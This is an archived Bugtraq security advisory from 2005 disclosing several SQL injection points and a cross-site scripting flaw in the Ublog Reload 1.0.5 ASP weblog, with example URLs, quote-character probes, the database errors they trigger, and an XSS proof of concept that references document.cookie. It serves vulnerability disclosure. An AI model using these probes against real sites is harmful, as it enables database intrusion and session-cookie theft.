[ECHO_ADV_18$2005] Multiple SQL INJECTION in Ublog Reload 1.0.5

the_day_at_echo.or.id
Date: 06/20/05

  • Next message: Roy Hills: "Cisco VPN Concentrator Groupname Enumeration Vulnerability"
    Date: 20 Jun 2005 03:34:39 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) ---------------------------------------------------------------------------
    [ECHO_ADV_18$2005] Multiple SQL INJECTION in Ublog Reload 1.0.5
    ---------------------------------------------------------------------------

    Author: Dedi Dwianto
    Date: June, 20th 2005
    Location: Indonesia, Jakarta
    Web: http://echo.or.id/adv/adv18-theday-2005.txt

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application : Ublog Reload
    version : 1.0.5
    url : http://www.uapplication.com/
    Author: uapplication
    Description:

    Ublog Reload is a complete weblog system write base asp.I Found Multiple
    Sql Injection Attack in this application.

    ---------------------------------------------------------------------------

    Vulnerabilitie:
    ~~~~~~~~~~~~~~~~

    A. SQL Injection
      
         * http://victim/UblogReload/index.asp?ci=[SQL INJECT][id]&s=category
       
         ex :
         http://victim/UblogReload/index.asp?ci='62&s=category
         
         Error :
         Microsoft VBScript runtime error '800a000d'
         Type mismatch: 'cint'

         /UblogReload/index.asp, line 41

        * http://victim/UblogReload/index.asp?d=[id][SQL Inject]&m=[mouth]&y=[year]&s=day
         
         ex :
         http://victim/UblogReload/index.asp?d=11'&m=6&y=2005&s=day

         Error :
         Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
         [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Day(data) = 11' AND Month(data) = 6 AND Year(data) = 2005 ORDER BY data DESC;'.

         /UblogReload/index.asp, line 101

       * http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=[year][SQL Inject]&d=&s=category

         Ex :
         http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
          
         Error :
         
         Microsoft VBScript runtime error '800a000d'

         Type mismatch: 'iThisYear'

         /UblogReload/include/calendar.asp, line 7

        
        * http://victim/UblogReload/index.asp?m=[mount][SQL Inject]&y=[year]&s=month
          
          Ex :
          http://victim/UblogReload/index.asp?m=6'&y=2005&s=month

          Error :
         
          Microsoft VBScript runtime error '800a000d'
          Type mismatch: 'cint'
          /UblogReload/include/functions_format_datetime.asp, line 26

        * http://victim/UblogReload/index.asp?ui=[user ID][SQL Inject]&s=bloggers

    And XSS
    POC :
         http://victim/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view
         http://victim/UblogReload/trackback.asp?bi=343&btitle=>alert('document.cookie')</script>&mode=view

    B. Fix
       Sorry I can't give solution because i can't view source code becase that's commersial Software.
       Contact vendor No response.

    ---------------------------------------------------------------------------

    Shoutz:
    ~~~~~~~

    ~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
    ~ Lieur Euy , MSR
    ~ newbie_hacker@yahoogroups.com ,
    ~ #e-c-h-o@DALNET

    ---------------------------------------------------------------------------
    Contact:
    ~~~~~~~~

         the_day || echo|staff || the_day[at]echo[dot]or[dot]id
         Homepage:
    http://theday.echo.or.id/

    -------------------------------- [ EOF ] ----------------------------------


  • Next message: Roy Hills: "Cisco VPN Concentrator Groupname Enumeration Vulnerability"